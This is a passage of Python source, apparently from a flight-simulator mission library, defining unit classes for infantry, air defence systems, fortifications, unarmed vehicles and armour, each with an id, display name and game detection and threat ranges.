500 air_weapon_dist = 500 class Soldier_M4_GRG(unittype.VehicleType): id = "Soldier M4 GRG" name = "Infantry M4 Georgia" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_RPG(unittype.VehicleType): id = "Soldier RPG" name = "Infantry RPG" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_mauser98(unittype.VehicleType): id = "soldier_mauser98" name = "Infantry Mauser 98" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_wwii_br_01(unittype.VehicleType): id = "soldier_wwii_br_01" name = "Infantry SMLE No.4 Mk-1" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class Soldier_wwii_us(unittype.VehicleType): id = "soldier_wwii_us" name = "Infantry M1 Garand" detection_range = 0 threat_range = 500 air_weapon_dist = 500 class AirDefence: class _2S6_Tunguska(unittype.VehicleType): id = "2S6 Tunguska" name = "SAM SA-19 Tunguska \"Grison\" " detection_range = 18000 threat_range = 8000 air_weapon_dist = 8000 class Kub_2P25_ln(unittype.VehicleType): id = "Kub 2P25 ln" name = "SAM SA-6 Kub \"Gainful\" TEL" detection_range = 0 threat_range = 25000 air_weapon_dist = 25000 class _5p73_s_125_ln(unittype.VehicleType): id = "5p73 s-125 ln" name = "SAM SA-3 S-125 \"Goa\" LN" detection_range = 0 threat_range = 18000 air_weapon_dist = 18000 class S_300PS_5P85C_ln(unittype.VehicleType): id = "S-300PS 5P85C ln" name = "SAM SA-10 S-300 \"Grumble\" TEL D" detection_range = 0 threat_range = 120000 air_weapon_dist = 120000 class S_300PS_5P85D_ln(unittype.VehicleType): id = "S-300PS 5P85D ln" name = "SAM SA-10 S-300 \"Grumble\" TEL C" detection_range = 0 threat_range = 120000 air_weapon_dist = 120000 class SA_11_Buk_LN_9A310M1(unittype.VehicleType): id = "SA-11 Buk LN 9A310M1" name = "SAM SA-11 Buk \"Gadfly\" Fire Dome TEL" detection_range = 50000 threat_range = 35000 air_weapon_dist = 35000 class Osa_9A33_ln(unittype.VehicleType): id = "Osa 9A33 ln" name = "SAM SA-8 Osa \"Gecko\" TEL" detection_range = 30000 threat_range = 10300 air_weapon_dist = 10300 class Tor_9A331(unittype.VehicleType): id = "Tor 9A331" name = "SAM SA-15 Tor \"Gauntlet\"" detection_range = 25000 threat_range = 12000 air_weapon_dist = 12000 class Strela_10M3(unittype.VehicleType): id = "Strela-10M3" name = "SAM SA-13 Strela 10M3 \"Gopher\" TEL" detection_range = 8000 threat_range = 5000 air_weapon_dist = 5000 class Strela_1_9P31(unittype.VehicleType): id = "Strela-1 9P31" name = "SAM SA-9 Strela 1 \"Gaskin\" TEL" detection_range = 5000 threat_range = 4200 air_weapon_dist = 4200 class SA_11_Buk_CC_9S470M1(unittype.VehicleType): id = "SA-11 Buk CC 9S470M1" name = "SAM SA-11 Buk \"Gadfly\" C2 " detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SA_8_Osa_LD_9T217(unittype.VehicleType): id = "SA-8 Osa LD 9T217" name = "SAM SA-8 Osa LD 9T217" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_AMG(unittype.VehicleType): id = "Patriot AMG" name = "SAM Patriot CR (AMG AN/MRC-137)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_ECS(unittype.VehicleType): id = "Patriot ECS" name = "SAM Patriot ECS" detection_range = 0 threat_range = 0 air_weapon_dist = 0 eplrs = True class Gepard(unittype.VehicleType): id = "Gepard" name = "SPAAA Gepard" detection_range = 15000 threat_range = 4000 air_weapon_dist = 4000 class Hawk_pcp(unittype.VehicleType): id = "Hawk pcp" name = "SAM Hawk Platoon Command Post (PCP)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Vulcan(unittype.VehicleType): id = "Vulcan" name = "SPAAA Vulcan M163" detection_range = 5000 threat_range = 2000 air_weapon_dist = 2000 eplrs = True class Hawk_ln(unittype.VehicleType): id = "Hawk ln" name = "SAM Hawk LN M192" detection_range = 0 threat_range = 45000 air_weapon_dist = 45000 class M48_Chaparral(unittype.VehicleType): id = "M48 Chaparral" name = "SAM Chaparral M48" detection_range = 10000 threat_range = 8500 air_weapon_dist = 8500 eplrs = True class M6_Linebacker(unittype.VehicleType): id = "M6 Linebacker" name = "SAM Linebacker - Bradley M6" detection_range = 8000 threat_range = 4500 air_weapon_dist = 4500 eplrs = True class Patriot_ln(unittype.VehicleType): id = "Patriot ln" name = "SAM Patriot LN" detection_range = 0 threat_range = 100000 air_weapon_dist = 100000 class M1097_Avenger(unittype.VehicleType): id = "M1097 Avenger" name = "SAM Avenger (Stinger)" detection_range = 5200 threat_range = 4500 air_weapon_dist = 4500 eplrs = True class Patriot_EPP(unittype.VehicleType): id = "Patriot EPP" name = "SAM Patriot EPP-III" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Patriot_cp(unittype.VehicleType): id = "Patriot cp" name = "SAM Patriot C2 ICC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Roland_ADS(unittype.VehicleType): id = "Roland ADS" name = "SAM Roland ADS" detection_range = 12000 threat_range = 8000 air_weapon_dist = 8000 class S_300PS_54K6_cp(unittype.VehicleType): id = "S-300PS 54K6 cp" name = "SAM SA-10 S-300 \"Grumble\" C2 " detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Soldier_stinger(unittype.VehicleType): id = "Soldier stinger" name = "MANPADS Stinger" detection_range = 5000 threat_range = 4500 air_weapon_dist = 4500 class Stinger_comm_dsr(unittype.VehicleType): id = "Stinger comm dsr" name = "MANPADS Stinger C2 Desert" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class Stinger_comm(unittype.VehicleType): id = "Stinger comm" name = "MANPADS Stinger C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class ZSU_23_4_Shilka(unittype.VehicleType): id = "ZSU-23-4 Shilka" name = "SPAAA ZSU-23-4 Shilka \"Gun Dish\"" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Emplacement_Closed(unittype.VehicleType): id = "ZU-23 Emplacement Closed" name = "AAA ZU-23 Closed Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Emplacement(unittype.VehicleType): id = "ZU-23 Emplacement" name = "AAA ZU-23 Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class Ural_375_ZU_23(unittype.VehicleType): id = "Ural-375 ZU-23" name = "SPAAA ZU-23-2 Mounted Ural 375" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Closed_Insurgent(unittype.VehicleType): id = "ZU-23 Closed Insurgent" name = "AAA ZU-23 Insurgent Closed Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class Ural_375_ZU_23_Insurgent(unittype.VehicleType): id = "Ural-375 ZU-23 Insurgent" name = "SPAAA ZU-23-2 Insurgent Mounted Ural-375" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class ZU_23_Insurgent(unittype.VehicleType): id = "ZU-23 Insurgent" name = "AAA ZU-23 Insurgent Emplacement" detection_range = 5000 threat_range = 2500 air_weapon_dist = 2500 class SA_18_Igla_manpad(unittype.VehicleType): id = "SA-18 Igla manpad" name = "MANPADS SA-18 Igla \"Grouse\"" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class SA_18_Igla_comm(unittype.VehicleType): id = "SA-18 Igla comm" name = "MANPADS SA-18 Igla \"Grouse\" C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class SA_18_Igla_S_manpad(unittype.VehicleType): id = "SA-18 Igla-S manpad" name = "MANPADS SA-18 Igla-S \"Grouse\"" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class SA_18_Igla_S_comm(unittype.VehicleType): id = "SA-18 Igla-S comm" name = "MANPADS SA-18 Igla-S \"Grouse\" C2" detection_range = 5000 threat_range = 0 air_weapon_dist = 0 class Igla_manpad_INS(unittype.VehicleType): id = "Igla manpad INS" name = "MANPADS SA-18 Igla \"Grouse\" Ins" detection_range = 5000 threat_range = 5200 air_weapon_dist = 5200 class _1L13_EWR(unittype.VehicleType): id = "1L13 EWR" name = "EWR 1L13" detection_range = 120000 threat_range = 0 air_weapon_dist = 0 class Kub_1S91_str(unittype.VehicleType): id = "Kub 1S91 str" name = "SAM SA-6 Kub \"Straight Flush\" STR" detection_range = 70000 threat_range = 0 air_weapon_dist = 0 class S_300PS_40B6M_tr(unittype.VehicleType): id = "S-300PS 40B6M tr" name = "SAM SA-10 S-300 \"Grumble\" Flap Lid TR " detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class S_300PS_40B6MD_sr(unittype.VehicleType): id = "S-300PS 40B6MD sr" name = "SAM SA-10 S-300 \"Grumble\" Clam Shell SR" detection_range = 60000 threat_range = 0 air_weapon_dist = 0 class _55G6_EWR(unittype.VehicleType): id = "55G6 EWR" name = "EWR 55G6" detection_range = 120000 threat_range = 0 air_weapon_dist = 0 class S_300PS_64H6E_sr(unittype.VehicleType): id = "S-300PS 64H6E sr" name = "SAM SA-10 S-300 \"Grumble\" Big Bird SR " detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class SA_11_Buk_SR_9S18M1(unittype.VehicleType): id = "SA-11 Buk SR 9S18M1" name = "SAM SA-11 Buk \"Gadfly\" Snow Drift SR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class Dog_Ear_radar(unittype.VehicleType): id = "Dog Ear radar" name = "MCC-SR Sborka \"Dog Ear\" SR" detection_range = 35000 threat_range = 0 air_weapon_dist = 0 class Hawk_tr(unittype.VehicleType): id = "Hawk tr" name = "SAM Hawk TR (AN/MPQ-46)" detection_range = 90000 threat_range = 0 air_weapon_dist = 0 class Hawk_sr(unittype.VehicleType): id = "Hawk sr" name = "SAM Hawk SR (AN/MPQ-50)" detection_range = 90000 threat_range = 0 air_weapon_dist = 0 eplrs = True class Patriot_str(unittype.VehicleType): id = "Patriot str" name = "SAM Patriot STR" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class Hawk_cwar(unittype.VehicleType): id = "Hawk cwar" name = "SAM Hawk CWAR AN/MPQ-55" detection_range = 70000 threat_range = 0 air_weapon_dist = 0 eplrs = True class P_19_s_125_sr(unittype.VehicleType): id = "p-19 s-125 sr" name = "SAM P19 \"Flat Face\" SR (SA-2/3)" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class Roland_Radar(unittype.VehicleType): id = "Roland Radar" name = "SAM Roland EWR" detection_range = 35000 threat_range = 0 air_weapon_dist = 0 class Snr_s_125_tr(unittype.VehicleType): id = "snr s-125 tr" name = "SAM SA-3 S-125 \"Low Blow\" TR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class S_75M_Volhov(unittype.VehicleType): id = "S_75M_Volhov" name = "SAM SA-2 S-75 \"Guideline\" LN" detection_range = 0 threat_range = 43000 air_weapon_dist = 43000 class SNR_75V(unittype.VehicleType): id = "SNR_75V" name = "SAM SA-2 S-75 \"Fan Song\" TR" detection_range = 100000 threat_range = 0 air_weapon_dist = 0 class RLS_19J6(unittype.VehicleType): id = "RLS_19J6" name = "SR 19J6" detection_range = 150000 threat_range = 0 air_weapon_dist = 0 class ZSU_57_2(unittype.VehicleType): id = "ZSU_57_2" name = "SPAAA ZSU-57-2" detection_range = 5000 threat_range = 7000 air_weapon_dist = 7000 class S_60_Type59_Artillery(unittype.VehicleType): id = "S-60_Type59_Artillery" name = "AAA S-60 57mm" detection_range = 5000 threat_range = 7000 air_weapon_dist = 7000 class Generator_5i57(unittype.VehicleType): id = "generator_5i57" name = "Disel Power Station 5I57A" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Bofors40(unittype.VehicleType): id = "bofors40" name = "AAA Bofors 40mm" detection_range = 0 threat_range = 4000 air_weapon_dist = 4000 class Rapier_fsa_launcher(unittype.VehicleType): id = "rapier_fsa_launcher" name = "SAM Rapier LN" detection_range = 30000 threat_range = 6800 air_weapon_dist = 6800 class Rapier_fsa_optical_tracker_unit(unittype.VehicleType): id = "rapier_fsa_optical_tracker_unit" name = "SAM Rapier Tracker" detection_range = 20000 threat_range = 0 air_weapon_dist = 0 class Rapier_fsa_blindfire_radar(unittype.VehicleType): id = "rapier_fsa_blindfire_radar" name = "SAM Rapier Blindfire TR" detection_range = 30000 threat_range = 0 air_weapon_dist = 0 class Flak18(unittype.VehicleType): id = "flak18" name = "AAA 8,8cm Flak 18" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class HQ_7_LN_SP(unittype.VehicleType): id = "HQ-7_LN_SP" name = "HQ-7 Self-Propelled LN" detection_range = 20000 threat_range = 12000 air_weapon_dist = 12000 class HQ_7_STR_SP(unittype.VehicleType): id = "HQ-7_STR_SP" name = "HQ-7 Self-Propelled STR" detection_range = 30000 threat_range = 0 air_weapon_dist = 0 class Flak30(unittype.VehicleType): id = "flak30" name = "AAA Flak 38 20mm" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class Flak36(unittype.VehicleType): id = "flak36" name = "AAA 8,8cm Flak 36" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class Flak37(unittype.VehicleType): id = "flak37" name = "AAA 8,8cm Flak 37" detection_range = 0 threat_range = 11000 air_weapon_dist = 11000 class Flak38(unittype.VehicleType): id = "flak38" name = "AAA Flak-Vierling 38 Quad 20mm" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class KDO_Mod40(unittype.VehicleType): id = "KDO_Mod40" name = "AAA SP Kdo.G.40" detection_range = 30000 threat_range = 0 air_weapon_dist = 0 class Flakscheinwerfer_37(unittype.VehicleType): id = "Flakscheinwerfer_37" name = "SL Flakscheinwerfer 37" detection_range = 15000 threat_range = 15000 air_weapon_dist = 0 class Maschinensatz_33(unittype.VehicleType): id = "Maschinensatz_33" name = "PU Maschinensatz_33" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Flak41(unittype.VehicleType): id = "flak41" name = "AAA 8,8cm Flak 41" detection_range = 0 threat_range = 12500 air_weapon_dist = 12500 class FuMG_401(unittype.VehicleType): id = "FuMG-401" name = "EWR FuMG-401 Freya LZ" detection_range = 160000 threat_range = 0 air_weapon_dist = 0 class FuSe_65(unittype.VehicleType): id = "FuSe-65" name = "EWR FuSe-65 Würzburg-Riese" detection_range = 60000 threat_range = 0 air_weapon_dist = 0 class QF_37_AA(unittype.VehicleType): id = "QF_37_AA" name = "AAA QF 3,7\"" detection_range = 0 threat_range = 9000 air_weapon_dist = 9000 class M45_Quadmount(unittype.VehicleType): id = "M45_Quadmount" name = "AAA M45 Quadmount HB 12.7mm" detection_range = 0 threat_range = 1500 air_weapon_dist = 1500 class M1_37mm(unittype.VehicleType): id = "M1_37mm" name = "AAA M1 37mm" detection_range = 0 threat_range = 5700 air_weapon_dist = 5700 class Fortification: class Bunker(unittype.VehicleType): id = "Bunker" name = "Bunker 2" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Sandbox(unittype.VehicleType): id = "Sandbox" name = "Bunker 1" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class House1arm(unittype.VehicleType): id = "house1arm" name = "Barracks armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class House2arm(unittype.VehicleType): id = "house2arm" name = "Watch tower armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Outpost_road(unittype.VehicleType): id = "outpost_road" name = "Road outpost" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class Outpost(unittype.VehicleType): id = "outpost" name = "Outpost" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class HouseA_arm(unittype.VehicleType): id = "houseA_arm" name = "Building armed" detection_range = 0 threat_range = 800 air_weapon_dist = 800 class TACAN_beacon(unittype.VehicleType): id = "TACAN_beacon" name = "Beacon TACAN Portable TTS 3030" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SK_C_28_naval_gun(unittype.VehicleType): id = "SK_C_28_naval_gun" name = "Gun 15cm SK C/28 Naval in Bunker" detection_range = 0 threat_range = 20000 air_weapon_dist = 0 class Fire_control(unittype.VehicleType): id = "fire_control" name = "Bunker with Fire Control Center" detection_range = 0 threat_range = 1100 air_weapon_dist = 1100 class Unarmed: class Ural_4320_APA_5D(unittype.VehicleType): id = "Ural-4320 APA-5D" name = "GPU APA-5D on Ural 4320" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATMZ_5(unittype.VehicleType): id = "ATMZ-5" name = "Refueler ATMZ-5" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATZ_10(unittype.VehicleType): id = "ATZ-10" name = "Refueler ATZ-10" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class GAZ_3307(unittype.VehicleType): id = "GAZ-3307" name = "Truck GAZ-3307" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class GAZ_3308(unittype.VehicleType): id = "GAZ-3308" name = "Truck GAZ-3308" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class GAZ_66(unittype.VehicleType): id = "GAZ-66" name = "Truck GAZ-66" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class M978_HEMTT_Tanker(unittype.VehicleType): id = "M978 HEMTT Tanker" name = "Refueler M978 HEMTT" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class HEMTT_TFFT(unittype.VehicleType): id = "HEMTT TFFT" name = "Firefighter HEMMT TFFT" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class IKARUS_Bus(unittype.VehicleType): id = "IKARUS Bus" name = "Bus IKARUS-280" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class KAMAZ_Truck(unittype.VehicleType): id = "KAMAZ Truck" name = "Truck KAMAZ 43101" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class LAZ_Bus(unittype.VehicleType): id = "LAZ Bus" name = "Bus LAZ-695" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class LiAZ_Bus(unittype.VehicleType): id = "LiAZ Bus" name = "Bus LiAZ-677" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Hummer(unittype.VehicleType): id = "Hummer" name = "LUV HMMWV Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 eplrs = True class M_818(unittype.VehicleType): id = "M 818" name = "Truck M939 Heavy" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class MAZ_6303(unittype.VehicleType): id = "MAZ-6303" name = "Truck MAZ-6303" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Predator_GCS(unittype.VehicleType): id = "Predator GCS" name = "MCC Predator UAV CP & GCS" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Predator_TrojanSpirit(unittype.VehicleType): id = "Predator TrojanSpirit" name = "MCC-COMM Predator UAV CL" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Suidae(unittype.VehicleType): id = "Suidae" name = "Suidae" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Tigr_233036(unittype.VehicleType): id = "Tigr_233036" name = "LUV Tigr" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Trolley_bus(unittype.VehicleType): id = "Trolley bus" name = "Bus ZIU-9 Trolley" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class UAZ_469(unittype.VehicleType): id = "UAZ-469" name = "LUV UAZ-469 Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_ATsP_6(unittype.VehicleType): id = "Ural ATsP-6" name = "Firefighter Ural ATsP-6" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_4320_31(unittype.VehicleType): id = "Ural-4320-31" name = "Truck Ural-4320-31 Arm'd" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_4320T(unittype.VehicleType): id = "Ural-4320T" name = "Truck Ural-4320T" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_375_PBU(unittype.VehicleType): id = "Ural-375 PBU" name = "Truck Ural-375 Mobile C2" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Ural_375(unittype.VehicleType): id = "Ural-375" name = "Truck Ural-375" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class VAZ_Car(unittype.VehicleType): id = "VAZ Car" name = "Car VAZ-2109" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZiL_131_APA_80(unittype.VehicleType): id = "ZiL-131 APA-80" name = "GPU APA-80 on ZIL-131" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class SKP_11(unittype.VehicleType): id = "SKP-11" name = "Truck SKP-11 Mobile ATC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_131_KUNG(unittype.VehicleType): id = "ZIL-131 KUNG" name = "Truck ZIL-131 (C2)" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_4331(unittype.VehicleType): id = "ZIL-4331" name = "Truck ZIL-4331" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class KrAZ6322(unittype.VehicleType): id = "KrAZ6322" name = "Truck KrAZ-6322 6x6" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATZ_5(unittype.VehicleType): id = "ATZ-5" name = "Refueler ATZ-5" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class AA8(unittype.VehicleType): id = "AA8" name = "Fire Fight Vehicle AA-7.2/60" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ATZ_60_Maz(unittype.VehicleType): id = "ATZ-60_Maz" name = "Refueler ATZ-60 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class ZIL_135(unittype.VehicleType): id = "ZIL-135" name = "Truck ZIL-135" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class TZ_22_KrAZ(unittype.VehicleType): id = "TZ-22_KrAZ" name = "Refueler TZ-22 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Bedford_MWD(unittype.VehicleType): id = "Bedford_MWD" name = "Truck Bedford" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Land_Rover_101_FC(unittype.VehicleType): id = "Land_Rover_101_FC" name = "Truck Land Rover 101 FC" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Land_Rover_109_S3(unittype.VehicleType): id = "Land_Rover_109_S3" name = "LUV Land Rover 109" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Blitz_36_6700A(unittype.VehicleType): id = "Blitz_36-6700A" name = "Truck Opel Blitz" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Kubelwagen_82(unittype.VehicleType): id = "Kubelwagen_82" name = "LUV Kubelwagen 82" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Sd_Kfz_2(unittype.VehicleType): id = "Sd_Kfz_2" name = "LUV Kettenrad" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Sd_Kfz_7(unittype.VehicleType): id = "Sd_Kfz_7" name = "Carrier Sd.Kfz.7 Tractor" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Horch_901_typ_40_kfz_21(unittype.VehicleType): id = "Horch_901_typ_40_kfz_21" name = "LUV Horch 901 Staff Car" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class CCKW_353(unittype.VehicleType): id = "CCKW_353" name = "Truck GMC \"Jimmy\" 6x6 Truck" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class Willys_MB(unittype.VehicleType): id = "Willys_MB" name = "Car Willys Jeep" detection_range = 0 threat_range = 0 air_weapon_dist = 0 class M30_CC(unittype.VehicleType): id = "M30_CC" name = "Carrier M30 Cargo" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class M4_Tractor(unittype.VehicleType): id = "M4_Tractor" name = "Tractor M4 Hi-Speed" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class Armor: class AAV7(unittype.VehicleType): id = "AAV7" name = "APC AAV-7 Amphibious" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 class BMD_1(unittype.VehicleType): id = "BMD-1" name = "IFV BMD-1" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class BMP_1(unittype.VehicleType): id = "BMP-1" name = "IFV BMP-1" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class BMP_2(unittype.VehicleType): id = "BMP-2" name = "IFV BMP-2" detection_range = 0 threat_range = 3000 air_weapon_dist = 2000 class BMP_3(unittype.VehicleType): id = "BMP-3" name = "IFV BMP-3" detection_range = 0 threat_range = 4000 air_weapon_dist = 2000 class BRDM_2(unittype.VehicleType): id = "BRDM-2" name = "Scout BRDM-2" detection_range = 0 threat_range = 1600 air_weapon_dist = 1600 class BTR_80(unittype.VehicleType): id = "BTR-80" name = "APC BTR-80" detection_range = 0 threat_range = 1600 air_weapon_dist = 1600 class BTR_D(unittype.VehicleType): id = "BTR_D" name = "APC BTR-RD" detection_range = 0 threat_range = 3000 air_weapon_dist = 1000 class Cobra(unittype.VehicleType): id = "Cobra" name = "Scout Cobra" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 class LAV_25(unittype.VehicleType): id = "LAV-25" name = "IFV LAV-25" detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class M1043_HMMWV_Armament(unittype.VehicleType): id = "M1043 HMMWV Armament" name = "Scout HMMWV" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class M1045_HMMWV_TOW(unittype.VehicleType): id = "M1045 HMMWV TOW" name = "ATGM HMMWV" detection_range = 0 threat_range = 3800 air_weapon_dist = 0 eplrs = True class M1126_Stryker_ICV(unittype.VehicleType): id = "M1126 Stryker ICV" name = "IFV M1126 Stryker ICV" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class M_113(unittype.VehicleType): id = "M-113" name = "APC M113" detection_range = 0 threat_range = 1200 air_weapon_dist = 1200 eplrs = True class M1134_Stryker_ATGM(unittype.VehicleType): id = "M1134 Stryker ATGM" name = "ATGM Stryker" detection_range = 0 threat_range = 3800 air_weapon_dist = 1000 eplrs = True class M_2_Bradley(unittype.VehicleType): id = "M-2 Bradley" name = "IFV M2A2 Bradley" detection_range = 0 threat_range = 3800 air_weapon_dist = 2500 eplrs = True class MCV_80(unittype.VehicleType): id = "MCV-80" name = "IFV Warrior " detection_range = 0 threat_range = 2500 air_weapon_dist = 2500 class MTLB(unittype.VehicleType): id = "MTLB" name = "APC MTLB" detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class Marder(unittype.VehicleType): id = "Marder" name = "IFV Marder" detection_range = 0 threat_range = 1500 air_weapon_dist = 1500 class TPZ(unittype.VehicleType): id = "TPZ" name = "APC TPz Fuchs " detection_range = 0 threat_range = 1000 air_weapon_dist = 1000 class Challenger2(unittype.VehicleType): id = "Challenger2" name = "MBT Challenger II" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Leclerc(unittype.VehicleType): id = "Leclerc" name = "MBT Leclerc" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class M_60(unittype.VehicleType): id = "M-60" name = "MBT M60A3 Patton" detection_range = 0 threat_range = 8000 air_weapon_dist = 1500 class M1128_Stryker_MGS(unittype.VehicleType): id = "M1128 Stryker MGS" name = "SPG Stryker MGS" detection_range = 0 threat_range = 4000 air_weapon_dist = 1200 eplrs = True class M_1_Abrams(unittype.VehicleType): id = "M-1 Abrams" name = "MBT M1A2 Abrams" detection_range = 0 threat_range = 3500 air_weapon_dist = 1200 eplrs = True class T_55(unittype.VehicleType): id = "T-55" name = "MBT T-55" detection_range = 0 threat_range = 2500 air_weapon_dist = 1200 class T_72B(unittype.VehicleType): id = "T-72B" name = "MBT T-72B" detection_range = 0 threat_range = 4000 air_weapon_dist = 3500 class T_80UD(unittype.VehicleType): id = "T-80UD" name = "MBT T-80U" detection_range = 0 threat_range = 5000 air_weapon_dist = 3500 class T_90(unittype.VehicleType): id = "T-90" name = "MBT T-90" detection_range = 0 threat_range = 5000 air_weapon_dist = 3500 class Leopard1A3(unittype.VehicleType): id = "Leopard1A3" name = "MBT Leopard 1A3" detection_range = 0 threat_range = 2500 air_weapon_dist = 1500 class Merkava_Mk4(unittype.VehicleType): id = "Merkava_Mk4" name = "MBT Merkava IV" detection_range = 0 threat_range = 3500 air_weapon_dist = 1200 class M4_Sherman(unittype.VehicleType): id = "M4_Sherman" name = "Tk M4 Sherman" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class M2A1_halftrack(unittype.VehicleType): id = "M2A1_halftrack" name = "APC M2A1 Halftrack" detection_range = 0 threat_range = 1200 air_weapon_dist = 0 class T_72B3(unittype.VehicleType): id = "T-72B3" name = "MBT T-72B3" detection_range = 0 threat_range = 4000 air_weapon_dist = 3500 class BTR_82A(unittype.VehicleType): id = "BTR-82A" name = "IFV BTR-82A" detection_range = 0 threat_range = 2000 air_weapon_dist = 2000 class PT_76(unittype.VehicleType): id = "PT_76" name = "LT PT-76" detection_range = 0 threat_range = 2000 air_weapon_dist = 1000 class Chieftain_mk3(unittype.VehicleType): id = "Chieftain_mk3" name = "MBT Chieftain Mk.3" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Pz_IV_H(unittype.VehicleType): id = "Pz_IV_H" name = "Tk PzIV H" detection_range = 0 threat_range = 3000 air_weapon_dist = 0 class Sd_Kfz_251(unittype.VehicleType): id = "Sd_Kfz_251" name = "APC Sd.Kfz.251 Halftrack" detection_range = 0 threat_range = 1100 air_weapon_dist = 0 class Leopard_2A5(unittype.VehicleType): id = "Leopard-2A5" name = "MBT Leopard-2A5" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Leopard_2(unittype.VehicleType): id = "Leopard-2" name = "MBT Leopard-2A6M" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Leopard_2A4(unittype.VehicleType): id = "leopard-2A4" name = "MBT Leopard-2A4" detection_range = 0 threat_range = 3500 air_weapon_dist = 1500 class Leopard_2A4_trs(unittype.VehicleType): id = "leopard-2A4_trs" name = "MBT 